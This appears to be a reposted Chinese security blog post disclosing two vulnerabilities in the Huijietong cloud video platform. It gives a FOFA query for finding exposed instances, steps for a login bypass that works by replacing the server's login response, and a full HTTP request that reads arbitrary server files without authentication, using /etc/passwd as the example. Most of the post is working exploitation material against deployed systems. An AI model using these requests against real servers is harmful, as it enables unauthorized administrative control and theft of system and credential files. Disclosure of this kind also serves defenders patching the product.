1、描述
会捷通云视讯平台存在登录绕过漏洞,可通过修改返回包绕过后台登录,还可进行任意操作删除,重启、升级、重置等等
会捷通云视讯平台存在任意文件读取漏洞。
2、影响范围
会捷通云视讯平台
3、漏洞复现
fofa:body="/him/api/rest/v1.0/node/role一、登录绕过漏洞
替换登录返回包内容即可绕过登录验证。
|
HTTP/1.1 200 Date: Thu, 25 Mar 2021 13:53:45 GMT Accept-Ranges: bytes Server: Restlet-Framework/2.1.1 Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept Content-Type: application/json;charset=UTF-8 Connection: close Content-Length: 28
{"token":null,"result":null} |
1. 拦截数据包
输入任意用户/密码,如admin/admin
2.点击登录,拦截返回包,替换为如下内容
正常返回包:提示密码错误:
替换:
放开拦截,可任意操作,删除,重启、升级、重置等等
|
HTTP/1.1 200 Date: Thu, 25 Mar 2021 13:53:45 GMT Accept-Ranges: bytes Server: Restlet-Framework/2.1.1 Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept Content-Type: application/json;charset=UTF-8 Connection: close Content-Length: 28
{"token":null,"result":null} |
二、任意文件读取漏洞
无需登录、可未授权读取服务器所有文件
通过访问漏洞url:
/fileDownload?action=downloadBackupFile再通过载体“fullPath=”即可进行任意文件读取
|
POST /fileDownload?action=downloadBackupFile HTTP/1.1 Host: x.x.x.x Content-Length: 20 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Origin: http://x.x.x.x Referer: http://x.x.x.x Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5 Connection: close
fullPath=/etc/passwd
|
本文始发于微信公众号(Qingy之安全):会捷通云视讯平台存在登录绕过漏洞和未授权任意文件读取漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论